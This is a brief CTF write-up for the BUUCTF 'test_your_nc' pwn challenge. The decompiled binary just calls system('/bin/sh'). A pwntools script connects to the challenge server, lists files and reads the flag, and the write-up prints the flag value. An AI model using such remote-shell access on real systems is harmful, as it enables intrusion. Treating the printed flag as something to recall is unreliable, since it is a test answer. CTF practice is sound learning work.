BUU-1-test_your_nc

BUU-1-test_your_nc

1. lxl@lxl-vm:~/BUU/test_your_nc1$ file test
   test: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=b113b62556555e43d9397c04b24fc651d0f71a99, not stripped

2. IDA 64

   int __cdecl main(int argc, const char **argv, const char **envp)
   {
     system("/bin/sh");
     return 0;
   }

   直接干呗

3. EXP

   from pwn import *
   p = remote('node3.buuoj.cn',27617)
   p.interactive()

   lxl@lxl-vm:~/BUU/test_your_nc1$ python test.py
   [+] Opening connection to node3.buuoj.cn on port 27617: Done
   [*] Switching to interactive mode
   $ ls
   bin
   boot
   dev
   etc
   flag
   home
   lib
   lib32
   lib64
   media
   mnt
   opt
   proc
   pwn
   root
   run
   sbin
   srv
   sys
   tmp
   usr
   var
   $ cat flag
   flag{e64934ea-23e6-4aa9-acf5-67a3be2e7d48}
   $  

   flag{e64934ea-23e6-4aa9-acf5-67a3be2e7d48}